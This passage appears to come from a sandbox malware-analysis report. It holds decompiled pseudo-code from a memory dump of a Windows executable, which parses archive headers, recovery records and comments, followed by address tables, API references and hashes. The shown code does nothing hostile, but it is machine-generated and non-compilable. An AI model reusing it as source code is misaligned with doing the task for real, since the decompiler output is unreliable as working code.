                                                    									 *(_t708 + 0x4c) = _t665;
                                                    									E00CCACC4(_t665, 0);
                                                    									_t560 = 5;
                                                    									memcpy(_t665, _t516 + 0x21fc, _t560 << 2);
                                                    									_t694 =  *(_t708 + 0x4c);
                                                    									_t668 =  *(_t708 + 0x18);
                                                    									_t562 =  *(_t694 + 8);
                                                    									 *(_t694 + 0x1098) =  *(_t694 + 8) & 1;
                                                    									 *(_t694 + 0x1099) = _t562 >> 0x00000001 & 1;
                                                    									 *(_t694 + 0x109b) = _t562 >> 0x00000002 & 1;
                                                    									 *(_t694 + 0x10a0) = _t562 >> 0x0000000a & 1;
                                                    									_t395 = _t562 & 0x00000010;
                                                    									__eflags = _t668 - 2;
                                                    									if(_t668 != 2) {
                                                    										L38:
                                                    										_t643 = 0;
                                                    										__eflags = 0;
                                                    										 *(_t708 + 0x5b) = 0;
                                                    										L39:
                                                    										 *((char*)(_t694 + 0x10f0)) =  *(_t708 + 0x5b);
                                                    										_t516 =  *((intOrPtr*)(_t708 + 0x14));
                                                    										__eflags = _t668 - 2;
                                                    										if(_t668 == 2) {
                                                    											L41:
                                                    											_t396 = _t643;
                                                    											L42:
                                                    											 *(_t694 + 0x10fa) = _t396;
                                                    											_t563 = _t562 & 0x000000e0;
                                                    											__eflags = _t563 - 0xe0;
                                                    											 *((char*)(_t694 + 0x10f1)) = 0 | _t563 == 0x000000e0;
                                                    											__eflags = _t563 - 0xe0;
                                                    											if(_t563 != 0xe0) {
                                                    												_t644 =  *(_t694 + 8);
                                                    												_t400 = 0x10000 << (_t644 >> 0x00000005 & 0x00000007);
                                                    												__eflags = 0x10000;
                                                    											} else {
                                                    												_t400 = _t643;
                                                    												_t644 =  *(_t694 + 8);
                                                    											}
                                                    											 *(_t694 + 0x10f4) = _t400;
                                                    											 *(_t694 + 0x10f3) = _t644 >> 0x0000000b & 0x00000001;
                                                    											 *(_t694 + 0x10f2) = _t644 >> 0x00000003 & 0x00000001;
                                                    											 *((intOrPtr*)(_t694 + 0x14)) = E00CCCBFB(_t708 + 0x1c);
                                                    											 *((intOrPtr*)(_t708 + 0x54)) = E00CCCBFB(_t708 + 0x1c);
                                                    											 *((char*)(_t694 + 0x18)) = E00CCCBAF(_t708 + 0x1c);
                                                    											 *(_t694 + 0x1070) = 2;
                                                    											 *((intOrPtr*)(_t694 + 0x1074)) = E00CCCBFB(_t708 + 0x1c);
                                                    											 *(_t708 + 0x44) = E00CCCBFB(_t708 + 0x1c);
                                                    											 *(_t694 + 0x1c) = E00CCCBAF(_t708 + 0x1c) & 0x000000ff;
                                                    											 *((char*)(_t694 + 0x20)) = E00CCCBAF(_t708 + 0x1c) - 0x30;
                                                    											 *(_t708 + 0x50) = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
                                                    											_t413 = E00CCCBFB(_t708 + 0x1c);
                                                    											_t647 =  *(_t694 + 0x1c);
                                                    											 *(_t708 + 0x48) = _t413;
                                                    											 *(_t694 + 0x24) = _t413;
                                                    											__eflags = _t647 - 0x14;
                                                    											if(_t647 < 0x14) {
                                                    												__eflags = _t413 & 0x00000010;
                                                    												if((_t413 & 0x00000010) != 0) {
                                                    													 *((char*)(_t694 + 0x10f1)) = 1;
                                                    												}
                                                    											}
                                                    											 *(_t694 + 0x109c) = 0;
                                                    											__eflags =  *(_t694 + 0x109b);
                                                    											if( *(_t694 + 0x109b) == 0) {
                                                    												L57:
                                                    												_t414 =  *((intOrPtr*)(_t694 + 0x18));
                                                    												 *(_t694 + 0x10fc) = 2;
                                                    												__eflags = _t414 - 3;
                                                    												if(_t414 == 3) {
                                                    													L61:
                                                    													 *(_t694 + 0x10fc) = 1;
                                                    													L62:
                                                    													 *(_t694 + 0x1100) = 0;
                                                    													__eflags = _t414 - 3;
                                                    													if(_t414 == 3) {
                                                    														__eflags = ( *(_t708 + 0x48) & 0x0000f000) - 0xa000;
                                                    														if(( *(_t708 + 0x48) & 0x0000f000) == 0xa000) {
                                                    															__eflags = 0;
                                                    															 *(_t694 + 0x1100) = 1;
                                                    															 *((short*)(_t694 + 0x1104)) = 0;
                                                    														}
                                                    													}
                                                    													__eflags = _t668 - 2;
                                                    													if(_t668 == 2) {
                                                    														L67:
                                                    														_t415 = 0;
                                                    														goto L68;
                                                    													} else {
                                                    														_t415 = 1;
                                                    														__eflags =  *(_t694 + 0x24);
                                                    														if( *(_t694 + 0x24) < 0) {
                                                    															L68:
                                                    															 *((char*)(_t694 + 0x10f8)) = _t415;
                                                    															_t418 =  *(_t694 + 8) >> 0x00000008 & 0x00000001;
                                                    															__eflags = _t418;
                                                    															 *(_t694 + 0x10f9) = _t418;
                                                    															if(_t418 == 0) {
                                                    																__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
                                                    																_t640 = 0;
                                                    																_t669 = 0;
                                                    																_t141 =  *((intOrPtr*)(_t708 + 0x54)) == 0xffffffff;
                                                    																__eflags = _t141;
                                                    																_t419 = _t418 & 0xffffff00 | _t141;
                                                    																L74:
                                                    																 *(_t694 + 0x109a) = _t419;
                                                    																 *(_t708 + 0x5b) = _t419;
                                                    																 *((intOrPtr*)(_t694 + 0x1058)) = 0 +  *((intOrPtr*)(_t694 + 0x14));
                                                    																asm("adc edi, ecx");
                                                    																 *((intOrPtr*)(_t694 + 0x105c)) = _t669;
                                                    																asm("adc edx, ecx");
                                                    																 *(_t694 + 0x1060) = 0 +  *((intOrPtr*)(_t708 + 0x54));
                                                    																__eflags =  *(_t708 + 0x5b);
                                                    																 *(_t694 + 0x1064) = _t640;
                                                    																if( *(_t708 + 0x5b) != 0) {
                                                    																	 *(_t694 + 0x1060) = 0x7fffffff;
                                                    																	 *(_t694 + 0x1064) = 0x7fffffff;
                                                    																}
                                                    																_t424 =  *(_t708 + 0x50);
                                                    																_t670 = 0x1fff;
                                                    																__eflags = _t424 - 0x1fff;
                                                    																if(_t424 < 0x1fff) {
                                                    																	_t670 = _t424;
                                                    																}
                                                    																E00CCCC5D(_t708 + 0x1c, _t708 - 0x2030, _t670);
                                                    																_t427 = 0;
                                                    																__eflags =  *(_t708 + 0x18) - 2;
                                                    																 *((char*)(_t708 + _t670 - 0x2030)) = 0;
                                                    																_t585 = ((0 |  *(_t708 + 0x18) == 0x00000002) - 0x00000001 & 0x00002350) + 0x22c0 + _t516;
                                                    																__eflags =  *(_t708 + 0x18) - 2;
                                                    																 *((intOrPtr*)(_t708 + 0x54)) = _t585;
                                                    																if( *(_t708 + 0x18) != 2) {
                                                    																	E00CD1B84(_t708 - 0x2030, _t585, 0x800);
                                                    																	_t431 =  *((intOrPtr*)(_t694 + 0xc)) -  *(_t708 + 0x50);
                                                    																	__eflags =  *(_t694 + 8) & 0x00000400;
                                                    																	_t671 = _t431 - 0x20;
                                                    																	if(( *(_t694 + 8) & 0x00000400) != 0) {
                                                    																		_t671 = _t431 - 0x28;
                                                    																	}
                                                    																	__eflags = _t671;
                                                    																	if(_t671 > 0) {
                                                    																		E00CC20BD(_t694 + 0x1028, _t671);
                                                    																		_t676 = _t694 + 0x1028;
                                                    																		_t431 = E00CE3E49(E00CCCC5D(_t708 + 0x1c,  *_t676, _t671),  *((intOrPtr*)(_t708 + 0x54)), L"RR");
                                                    																		__eflags = _t431;
                                                    																		if(_t431 == 0) {
                                                    																			__eflags =  *((intOrPtr*)(_t694 + 0x102c)) - 0x14;
                                                    																			if( *((intOrPtr*)(_t694 + 0x102c)) >= 0x14) {
                                                    																				_t609 =  *_t676;
                                                    																				_t184 = _t609 + 0xb; // 0x7500
                                                    																				asm("cdq");
                                                    																				_t695 =  *_t184 & 0x000000ff;
                                                    																				_t185 = _t609 + 0xa; // 0x750025
                                                    																				asm("cdq");
                                                    																				_t697 = (_t695 << 8) + ( *_t185 & 0x000000ff);
                                                    																				_t190 = _t609 + 9; // 0x75002500
                                                    																				asm("adc edi, edx");
                                                    																				asm("cdq");
                                                    																				_t699 = (_t697 << 8) + ( *_t190 & 0x000000ff);
                                                    																				_t195 = _t609 + 8; // 0x250068
                                                    																				asm("adc edi, edx");
                                                    																				asm("cdq");
                                                    																				_t701 = (_t699 << 8) + ( *_t195 & 0x000000ff);
                                                    																				asm("adc edi, edx");
                                                    																				 *(_t516 + 0x21d8) = _t701 << 9;
                                                    																				 *(_t516 + 0x21dc) = ((((_t640 << 0x00000020 | _t695) << 0x8 << 0x00000020 | _t697) << 0x8 << 0x00000020 | _t699) << 0x8 << 0x00000020 | _t701) << 9;
                                                    																				 *0xcf3278();
                                                    																				_t469 = E00CD0264( *(_t516 + 0x21d8),  *(_t516 + 0x21dc),  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))(), _t640);
                                                    																				 *(_t516 + 0x21e0) = _t469;
                                                    																				 *(_t708 + 0x48) = _t469;
                                                    																				_t470 = E00CDEBA0(_t468, _t640, 0xc8, 0);
                                                    																				asm("adc edx, [ebx+0x21dc]");
                                                    																				_t431 = E00CD0264(_t470 +  *(_t516 + 0x21d8), _t640, _t468, _t640);
                                                    																				_t612 =  *(_t708 + 0x48);
                                                    																				_t694 =  *(_t708 + 0x4c);
                                                    																				__eflags = _t431 - _t612;
                                                    																				if(_t431 > _t612) {
                                                    																					_t431 = _t612 + 1;
                                                    																					 *(_t516 + 0x21e0) = _t612 + 1;
                                                    																				}
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																	_t432 = E00CE3E49(_t431,  *((intOrPtr*)(_t708 + 0x54)), L"CMT");
                                                    																	__eflags = _t432;
                                                    																	if(_t432 == 0) {
                                                    																		 *((char*)(_t516 + 0x6cce)) = 1;
                                                    																	}
                                                    																} else {
                                                    																	_t640 = 0;
                                                    																	 *_t585 = 0;
                                                    																	__eflags =  *(_t694 + 8) & 0x00000200;
                                                    																	if(( *(_t694 + 8) & 0x00000200) != 0) {
                                                    																		E00CC6976(_t708);
                                                    																		_t478 = E00CE3E90(_t708 - 0x2030) + 1;
                                                    																		__eflags = _t670 - _t478;
                                                    																		if(_t670 > _t478) {
                                                    																			__eflags = _t478 + _t708 - 0x2030;
                                                    																			E00CC6986(_t708, _t708 - 0x2030, _t670, _t478 + _t708 - 0x2030, _t670 - _t478,  *((intOrPtr*)(_t708 + 0x54)), 0x800);
                                                    																		}
                                                    																		_t585 =  *((intOrPtr*)(_t708 + 0x54));
                                                    																		_t427 = 0;
                                                    																		__eflags = 0;
                                                    																	}
                                                    																	__eflags =  *_t585 - _t427;
                                                    																	if( *_t585 == _t427) {
                                                    																		_push(1);
                                                    																		_push(0x800);
                                                    																		_push(_t585);
                                                    																		_push(_t708 - 0x2030);
                                                    																		E00CD02BA();
                                                    																	}
                                                    																	E00CC2134(_t516, _t694);
                                                    																}
                                                    																__eflags =  *(_t694 + 8) & 0x00000400;
                                                    																if(( *(_t694 + 8) & 0x00000400) != 0) {
                                                    																	E00CCCC5D(_t708 + 0x1c, _t694 + 0x10a1, 8);
                                                    																}
                                                    																E00CD140E( *(_t708 + 0x44));
                                                    																__eflags =  *(_t694 + 8) & 0x00001000;
                                                    																if(( *(_t694 + 8) & 0x00001000) == 0) {
                                                    																	L112:
                                                    																	 *((intOrPtr*)(_t516 + 0x6cc0)) = E00CC3EFB( *((intOrPtr*)(_t516 + 0x6cc0)),  *(_t516 + 0x6cc4),  *((intOrPtr*)(_t694 + 0x1058)),  *((intOrPtr*)(_t694 + 0x105c)), 0, 0);
                                                    																	 *(_t516 + 0x6cc4) = _t640;
                                                    																	 *(_t708 + 0x44) =  *(_t694 + 0x10f2);
                                                    																	_t437 = E00CCCCAC(_t708 + 0x1c,  *(_t708 + 0x44));
                                                    																	__eflags =  *_t694 - (_t437 & 0x0000ffff);
                                                    																	if( *_t694 != (_t437 & 0x0000ffff)) {
                                                    																		 *((char*)(_t516 + 0x6cdc)) = 1;
                                                    																		E00CC6D83(0xd01098, 1);
                                                    																		__eflags =  *((char*)(_t708 + 0x5a));
                                                    																		if(__eflags == 0) {
                                                    																			E00CC2021(__eflags, 0x1c, _t516 + 0x32,  *((intOrPtr*)(_t708 + 0x54)));
                                                    																		}
                                                    																	}
                                                    																	goto L119;
                                                    																} else {
                                                    																	_t442 = E00CCCBC6(_t708 + 0x1c);
                                                    																	 *_t708 = _t516 + 0x32d8;
                                                    																	 *((intOrPtr*)(_t708 + 4)) = _t516 + 0x32e0;
                                                    																	 *((intOrPtr*)(_t708 + 8)) = _t516 + 0x32e8;
                                                    																	__eflags = 0;
                                                    																	_t672 = 0;
                                                    																	 *((intOrPtr*)(_t708 + 0xc)) = 0;
                                                    																	_t447 = _t442 & 0x0000ffff;
                                                    																	 *(_t708 + 0x50) = 0;
                                                    																	 *(_t708 + 0x44) = _t447;
                                                    																	do {
                                                    																		_t593 = 3;
                                                    																		_t520 = _t447 >> _t593 - _t672 << 2;
                                                    																		__eflags = _t520 & 0x00000008;
                                                    																		if((_t520 & 0x00000008) == 0) {
                                                    																			goto L110;
                                                    																		}
                                                    																		__eflags =  *(_t708 + _t672 * 4);
                                                    																		if( *(_t708 + _t672 * 4) == 0) {
                                                    																			goto L110;
                                                    																		}
                                                    																		__eflags = _t672;
                                                    																		if(__eflags != 0) {
                                                    																			E00CD140E(E00CCCBFB(_t708 + 0x1c));
                                                    																		}
                                                    																		E00CD1218( *(_t708 + _t672 * 4), _t640, _t708, __eflags, _t708 - 0x30);
                                                    																		__eflags = _t520 & 0x00000004;
                                                    																		if((_t520 & 0x00000004) != 0) {
                                                    																			_t249 = _t708 - 0x1c;
                                                    																			 *_t249 =  *(_t708 - 0x1c) + 1;
                                                    																			__eflags =  *_t249;
                                                    																		}
                                                    																		_t597 = 0;
                                                    																		 *(_t708 - 0x18) = 0;
                                                    																		_t521 = _t520 & 0x00000003;
                                                    																		__eflags = _t521;
                                                    																		if(_t521 <= 0) {
                                                    																			L109:
                                                    																			_t450 = _t597 * 0x64;
                                                    																			__eflags = _t450;
                                                    																			 *(_t708 - 0x18) = _t450;
                                                    																			E00CD146A( *(_t708 + _t672 * 4), _t640, _t708 - 0x30);
                                                    																			_t447 =  *(_t708 + 0x44);
                                                    																		} else {
                                                    																			_t673 = 3;
                                                    																			_t675 = _t673 - _t521 << 3;
                                                    																			__eflags = _t675;
                                                    																			do {
                                                    																				_t455 = (E00CCCBAF(_t708 + 0x1c) & 0x000000ff) << _t675;
                                                    																				_t675 = _t675 + 8;
                                                    																				_t597 =  *(_t708 - 0x18) | _t455;
                                                    																				 *(_t708 - 0x18) = _t597;
                                                    																				_t521 = _t521 - 1;
                                                    																				__eflags = _t521;
                                                    																			} while (_t521 != 0);
                                                    																			_t672 =  *(_t708 + 0x50);
                                                    																			goto L109;
                                                    																		}
                                                    																		L110:
                                                    																		_t672 = _t672 + 1;
                                                    																		 *(_t708 + 0x50) = _t672;
                                                    																		__eflags = _t672 - 4;
                                                    																	} while (_t672 < 4);
                                                    																	_t516 =  *((intOrPtr*)(_t708 + 0x14));
                                                    																	goto L112;
                                                    																}
                                                    															}
                                                    															_t669 = E00CCCBFB(_t708 + 0x1c);
                                                    															_t484 = E00CCCBFB(_t708 + 0x1c);
                                                    															__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
                                                    															_t640 = _t484;
                                                    															if( *((intOrPtr*)(_t708 + 0x54)) != 0xffffffff) {
                                                    																L72:
                                                    																_t419 = 0;
                                                    																goto L74;
                                                    															}
                                                    															__eflags = _t640 - 0xffffffff;
                                                    															if(_t640 != 0xffffffff) {
                                                    																goto L72;
                                                    															}
                                                    															_t419 = 1;
                                                    															goto L74;
                                                    														}
                                                    														goto L67;
                                                    													}
                                                    												}
                                                    												__eflags = _t414 - 5;
                                                    												if(_t414 == 5) {
                                                    													goto L61;
                                                    												}
                                                    												__eflags = _t414 - 6;
                                                    												if(_t414 < 6) {
                                                    													 *(_t694 + 0x10fc) = 0;
                                                    												}
                                                    												goto L62;
                                                    											} else {
                                                    												_t648 = _t647 - 0xd;
                                                    												__eflags = _t648;
                                                    												if(_t648 == 0) {
                                                    													 *(_t694 + 0x109c) = 1;
                                                    													goto L57;
                                                    												}
                                                    												_t650 = _t648;
                                                    												__eflags = _t650;
                                                    												if(_t650 == 0) {
                                                    													 *(_t694 + 0x109c) = 2;
                                                    													goto L57;
                                                    												}
                                                    												_t651 = _t650 - 5;
                                                    												__eflags = _t651;
                                                    												if(_t651 == 0) {
                                                    													L54:
                                                    													 *(_t694 + 0x109c) = 3;
                                                    													goto L57;
                                                    												}
                                                    												__eflags = _t651 == 6;
                                                    												if(_t651 == 6) {
                                                    													goto L54;
                                                    												}
                                                    												 *(_t694 + 0x109c) = 4;
                                                    												goto L57;
                                                    											}
                                                    										}
                                                    										__eflags = _t395;
                                                    										_t396 = 1;
                                                    										if(_t395 != 0) {
                                                    											goto L42;
                                                    										}
                                                    										goto L41;
                                                    									}
                                                    									__eflags = _t395;
                                                    									if(_t395 == 0) {
                                                    										goto L38;
                                                    									}
                                                    									 *(_t708 + 0x5b) = 1;
                                                    									_t643 = 0;
                                                    									goto L39;
                                                    								}
                                                    								_t488 = _t378 - 1;
                                                    								__eflags = _t488;
                                                    								if(_t488 == 0) {
                                                    									goto L35;
                                                    								}
                                                    								__eflags = _t488 == 0;
                                                    								if(_t488 == 0) {
                                                    									_t624 = 5;
                                                    									memcpy(_t516 + 0x45a8, _t516 + 0x21fc, _t624 << 2);
                                                    									_t653 =  *(_t516 + 0x45b0);
                                                    									 *(_t516 + 0x45c4) =  *(_t516 + 0x45b0) & 0x00000001;
                                                    									_t628 = _t653 >> 0x00000001 & 0x00000001;
                                                    									_t640 = _t653 >> 0x00000003 & 0x00000001;
                                                    									 *(_t516 + 0x45c5) = _t628;
                                                    									 *(_t516 + 0x45c6) = _t653 >> 0x00000002 & 0x00000001;
                                                    									 *(_t516 + 0x45c7) = _t640;
                                                    									__eflags = _t628;
                                                    									if(_t628 != 0) {
                                                    										 *((intOrPtr*)(_t516 + 0x45bc)) = E00CCCBFB(_t708 + 0x1c);
                                                    									}
                                                    									__eflags =  *(_t516 + 0x45c7);
                                                    									if( *(_t516 + 0x45c7) != 0) {
                                                    										_t498 = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
                                                    										 *(_t516 + 0x45c0) = _t498;
                                                    										 *(_t516 + 0x6cf0) = _t498;
                                                    									}
                                                    									goto L119;
                                                    								} else {
                                                    									__eflags =  *(_t516 + 0x2204) & 0x00008000;
                                                    									if(( *(_t516 + 0x2204) & 0x00008000) != 0) {
                                                    										 *((intOrPtr*)(_t516 + 0x6cc0)) =  *((intOrPtr*)(_t516 + 0x6cc0)) + E00CCCBFB(_t708 + 0x1c);
                                                    										asm("adc dword [ebx+0x6cc4], 0x0");
                                                    									}
                                                    									goto L120;
                                                    								}
                                                    							}
                                                    							__eflags = _t688 - 1;
                                                    							if(_t688 != 1) {
                                                    								L24:
                                                    								_t335 = _t533 - 7;
                                                    								goto L25;
                                                    							}
                                                    							__eflags =  *(_t516 + 0x2204) & 0x00000002;
                                                    							if(( *(_t516 + 0x2204) & 0x00000002) == 0) {
                                                    								goto L24;
                                                    							}
                                                    							goto L23;
                                                    						}
                                                    						_t501 = _t334 - 1;
                                                    						__eflags = _t501;
                                                    						if(_t501 == 0) {
                                                    							 *(_t516 + 0x2200) = _t640;
                                                    							_t688 = _t640;
                                                    							goto L20;
                                                    						}
                                                    						_t502 = _t501 - 6;
                                                    						__eflags = _t502;
                                                    						if(_t502 == 0) {
                                                    							_push(3);
                                                    							L17:
                                                    							_pop(_t503);
                                                    							 *(_t516 + 0x2200) = _t503;
                                                    							_t688 = _t503;
                                                    							goto L20;
                                                    						}
                                                    						__eflags = _t502 != 1;
                                                    						if(_t502 != 1) {
                                                    							goto L20;
                                                    						} else {
                                                    							_push(5);
                                                    							goto L17;
                                                    						}
                                                    					} else {
                                                    						E00CC20D7(_t516);
                                                    						goto L131;
                                                    					}
                                                    				}
                                                    				_t639 =  *((intOrPtr*)(__ecx + 0x6cd8)) + _t657;
                                                    				asm("adc eax, ecx");
                                                    				_t718 =  *((intOrPtr*)(__ecx + 0x6cbc));
                                                    				if(_t718 < 0 || _t718 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t639) {
                                                    					goto L7;
                                                    				} else {
                                                    					 *((char*)(_t708 + 0x5a)) = 1;
                                                    					E00CC3E6D(_t516);
                                                    					 *0xcf3278(_t708 + 0x40, 8);
                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0xc))))() == 8) {
                                                    						_t707 = _t516 + 0x1038;
                                                    						E00CC603A(_t707, 0, 4,  *((intOrPtr*)(_t516 + 0x21d4)) + 0x6024, _t708 + 0x40, 0, 0, 0, 0);
                                                    						 *((intOrPtr*)(_t708 + 0x3c)) = _t707;
                                                    						goto L8;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    			}
























































































                                                    0x00cc303a
                                                    0x00cc303d
                                                    0x00cc3040
                                                    0x00cc3042
                                                    0x00cc304a
                                                    0x00cc304c
                                                    0x00cc304f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3051
                                                    0x00cc3056
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3058
                                                    0x00cc305a
                                                    0x00cc3069
                                                    0x00cc3069
                                                    0x00cc3076
                                                    0x00cc307b
                                                    0x00cc307e
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3083
                                                    0x00cc3085
                                                    0x00cc3088
                                                    0x00cc3088
                                                    0x00cc308b
                                                    0x00cc30b7
                                                    0x00cc30b7
                                                    0x00cc30b7
                                                    0x00cc30be
                                                    0x00cc30c5
                                                    0x00cc30ca
                                                    0x00cc308d
                                                    0x00cc308f
                                                    0x00cc3092
                                                    0x00cc3092
                                                    0x00cc3095
                                                    0x00cc30a2
                                                    0x00cc30a4
                                                    0x00cc30aa
                                                    0x00cc30ac
                                                    0x00cc30af
                                                    0x00cc30af
                                                    0x00cc30af
                                                    0x00cc30b4
                                                    0x00000000
                                                    0x00cc30b4
                                                    0x00cc30cd
                                                    0x00cc30cd
                                                    0x00cc30ce
                                                    0x00cc30d1
                                                    0x00cc30d1
                                                    0x00cc30da
                                                    0x00000000
                                                    0x00cc30da
                                                    0x00cc3005
                                                    0x00cc2d69
                                                    0x00cc2d6b
                                                    0x00cc2d70
                                                    0x00cc2d74
                                                    0x00cc2d76
                                                    0x00cc2d83
                                                    0x00cc2d85
                                                    0x00000000
                                                    0x00cc2d85
                                                    0x00cc2d78
                                                    0x00cc2d7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2d7d
                                                    0x00000000
                                                    0x00cc2d7f
                                                    0x00000000
                                                    0x00cc2d44
                                                    0x00cc2d3d
                                                    0x00cc2cf4
                                                    0x00cc2cf6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2cf8
                                                    0x00cc2cfa
                                                    0x00cc2cfc
                                                    0x00cc2cfc
                                                    0x00000000
                                                    0x00cc2ca0
                                                    0x00cc2ca0
                                                    0x00cc2ca0
                                                    0x00cc2ca3
                                                    0x00cc2cd9
                                                    0x00000000
                                                    0x00cc2cd9
                                                    0x00cc2ca6
                                                    0x00cc2ca6
                                                    0x00cc2ca9
                                                    0x00cc2ccd
                                                    0x00000000
                                                    0x00cc2ccd
                                                    0x00cc2cab
                                                    0x00cc2cab
                                                    0x00cc2cae
                                                    0x00cc2cc1
                                                    0x00cc2cc1
                                                    0x00000000
                                                    0x00cc2cc1
                                                    0x00cc2cb0
                                                    0x00cc2cb3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2cb5
                                                    0x00000000
                                                    0x00cc2cb5
                                                    0x00cc2c9e
                                                    0x00cc2ba2
                                                    0x00cc2ba4
                                                    0x00cc2ba6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2ba6
                                                    0x00cc2b81
                                                    0x00cc2b83
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2b85
                                                    0x00cc2b88
                                                    0x00000000
                                                    0x00cc2b88
                                                    0x00cc2a4b
                                                    0x00cc2a4b
                                                    0x00cc2a4e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2a55
                                                    0x00cc2a58
                                                    0x00cc2a8c
                                                    0x00cc2a93
                                                    0x00cc2a9b
                                                    0x00cc2aa3
                                                    0x00cc2ab2
                                                    0x00cc2aba
                                                    0x00cc2abd
                                                    0x00cc2ac3
                                                    0x00cc2ac9
                                                    0x00cc2acf
                                                    0x00cc2ad1
                                                    0x00cc2adb
                                                    0x00cc2adb
                                                    0x00cc2ae1
                                                    0x00cc2ae8
                                                    0x00cc2af6
                                                    0x00cc2af9
                                                    0x00cc2aff
                                                    0x00cc2aff
                                                    0x00000000
                                                    0x00cc2a5a
                                                    0x00cc2a5a
                                                    0x00cc2a64
                                                    0x00cc2a72
                                                    0x00cc2a78
                                                    0x00cc2a78
                                                    0x00000000
                                                    0x00cc2a64
                                                    0x00cc2a58
                                                    0x00cc29e7
                                                    0x00cc29ea
                                                    0x00cc29fa
                                                    0x00cc29fa
                                                    0x00000000
                                                    0x00cc29fa
                                                    0x00cc29ec
                                                    0x00cc29f3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc29f3
                                                    0x00cc29a5
                                                    0x00cc29a5
                                                    0x00cc29a8
                                                    0x00cc29c5
                                                    0x00cc29cb
                                                    0x00000000
                                                    0x00cc29cb
                                                    0x00cc29aa
                                                    0x00cc29aa
                                                    0x00cc29ad
                                                    0x00cc29b8
                                                    0x00cc29ba
                                                    0x00cc29ba
                                                    0x00cc29bb
                                                    0x00cc29c1
                                                    0x00000000
                                                    0x00cc29c1
                                                    0x00cc29af
                                                    0x00cc29b2
                                                    0x00000000
                                                    0x00cc29b4
                                                    0x00cc29b4
                                                    0x00000000
                                                    0x00cc29b4
                                                    0x00cc298f
                                                    0x00cc2991
                                                    0x00000000
                                                    0x00cc2991
                                                    0x00cc298d
                                                    0x00cc28af
                                                    0x00cc28b1
                                                    0x00cc28b3
                                                    0x00cc28b9
                                                    0x00000000
                                                    0x00cc28c5
                                                    0x00cc28c7
                                                    0x00cc28cb
                                                    0x00cc28dd
                                                    0x00cc28ea
                                                    0x00cc2908
                                                    0x00cc2919
                                                    0x00cc291e
                                                    0x00000000
                                                    0x00cc291e
                                                    0x00000000
                                                    0x00cc28ea

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC2874
                                                    • _strlen.LIBCMT ref: 00CC2E3F
                                                      • Part of subcall function 00CD02BA: __EH_prolog.LIBCMT ref: 00CD02BF
                                                      • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010398), ref: 00CD1BA0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2F91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                    • String ID: CMT
                                                    • API String ID: 1206968400-2756464174
                                                    • Opcode ID: 90393e986017eafdb8abc97c81c7ab2fb9ebafef90a52767d266c3c0259390aa
                                                    • Instruction ID: 24fb1c7222b9835cfd24726184c91ee2a04b0024a47753a05fe04976cb6ef7d9
                                                    • Opcode Fuzzy Hash: 90393e986017eafdb8abc97c81c7ab2fb9ebafef90a52767d266c3c0259390aa
                                                    • Instruction Fuzzy Hash: 9F6207715002858FDF19DF78C895FEA3BA1EF54300F08857EECAA8B282D7759A45DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00CDF838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                    				char _v0;
                                                    				struct _EXCEPTION_POINTERS _v12;
                                                    				intOrPtr _v80;
                                                    				intOrPtr _v88;
                                                    				char _v92;
                                                    				intOrPtr _v608;
                                                    				intOrPtr _v612;
                                                    				void* _v616;
                                                    				intOrPtr _v620;
                                                    				char _v624;
                                                    				intOrPtr _v628;
                                                    				intOrPtr _v632;
                                                    				intOrPtr _v636;
                                                    				intOrPtr _v640;
                                                    				intOrPtr _v644;
                                                    				intOrPtr _v648;
                                                    				intOrPtr _v652;
                                                    				intOrPtr _v656;
                                                    				intOrPtr _v660;
                                                    				intOrPtr _v664;
                                                    				intOrPtr _v668;
                                                    				char _v808;
                                                    				char* _t39;
                                                    				long _t49;
                                                    				intOrPtr _t51;
                                                    				void* _t54;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t57;
                                                    				intOrPtr _t58;
                                                    				intOrPtr _t59;
                                                    				intOrPtr* _t60;
                                                    
                                                    				_t59 = __esi;
                                                    				_t58 = __edi;
                                                    				_t57 = __edx;
